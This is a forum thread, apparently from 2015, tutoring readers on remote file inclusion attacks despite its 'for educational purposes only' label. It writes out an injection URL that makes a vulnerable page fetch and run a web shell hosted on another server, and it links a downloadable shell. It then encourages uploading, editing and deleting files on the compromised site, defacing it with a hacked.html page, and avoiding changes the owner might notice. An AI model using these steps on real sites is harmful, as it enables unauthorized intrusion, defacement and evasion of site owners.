Hello There, Guest!

l Register
Current time: 04-28-2024, 09:54 AM
facebook twitter youtube google+ feedburner
  • http://tricksduniya.com
  • Welcome the world of CRYPTO CURRENCY
  • visit daily
  • For Whatsapp Official Group Contact Our Modrate
  • Mr. Paramjit Singh = 08295205000
  • Mr. Mack = 08295943112


Tricks Duniya -ONLINE SHOPPING GUIDE, MOBILE TRICKS, ANDROID TRICKS, HACKING > RULEBRAKER ZONE > Ethical Hacking > hacking with R.F.I >

 Replies: 0    views: 336
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 hacking with R.F.I
Download App
03-01-2015, 04:35 PM,
Offline
Administrator
Joined: Nov 2014
Mesajlar : 609
Konular:
Rep Puanı: 7

Points: 0₹
Points: 0₹
#1
hacking with R.F.I

FOR EDUCATIONAL PURPOSES ONLY!


Firstly you will need our RFI test sheet
http://pastebin.com/PJ5K8fKj

Upload that to your server and save it as RFI.php.

When you access that file via a web browser it will look like this
[Image: 1_23.jpg]


Very fancy [Image: tongue7689.gif]

But the idea of this page is to open a file in the same page kinda like an iframe. 
If we browse to http://www.mysite.com/rfi.php?page=http://www.google.co.uk/ (Take note of the location of http://www.google.co.uk/)
[Image: 2_7.jpg]


This page is going to run anything that is after rfi.php?page= in the url. With that in mind we now understand that a shell can be executed from the server.

So now you must upload a shell to our server,
if we don't already own a shell we can download a free shell here
http://www.multiupload.com/REU9V5EQAF

Ok now it is uploaded to our server we must now inject it into the RFI test sheet. Like this http://www.mysite.com/rfi.php?page=http://www.mysite.com/shell.txt? we include the last ? to tell the page to run the code and not to display the page/code.

Now you will see that the site has executed the shells code as if it was part of the original page [Image: abiggrin.gif].
[Image: 1_23.jpg]


Meaning we can now upload,edit,delete any file we please to. [Image: smile7689.gif]

Do not change the index of the site as the owner may catch you.
Upload a hacked.html page . 

Possibly Related Threads…
learn Free Ethical Hacking Using Your Android by YoVt


admin signature
                                Heart TricksDuniya.com Heart
                    keep Visiting TricksDuniya
              Don't Forgot to Register Yourself!



03-01-2015, 04:35 PM
Reply
« Next Oldest | Next Newest »
Users browsing this thread: 1 Guest(s)



Possibly Related Threads…
Thread Author Replies Views Last Post
  learn Free Ethical Hacking Using Your Android by YoVt Yovt 4 867 11-06-2015, 07:16 PM
Last Post: Yovt
  BEST OPERATING SYSTEMS (OS) FOR HACKING/PENTESTING WITH DOWNLODING LINK Pammy 0 669 08-11-2015, 04:42 PM
Last Post: Pammy
  Hacking Tutorials 2015 paramjeet 0 641 06-13-2015, 10:19 PM
Last Post: paramjeet

Forum Jump:

Powered By Mack Doun
© 2015-2024 Paramjit Singh.
TricksDuniya theme TricksDuniya © 2015.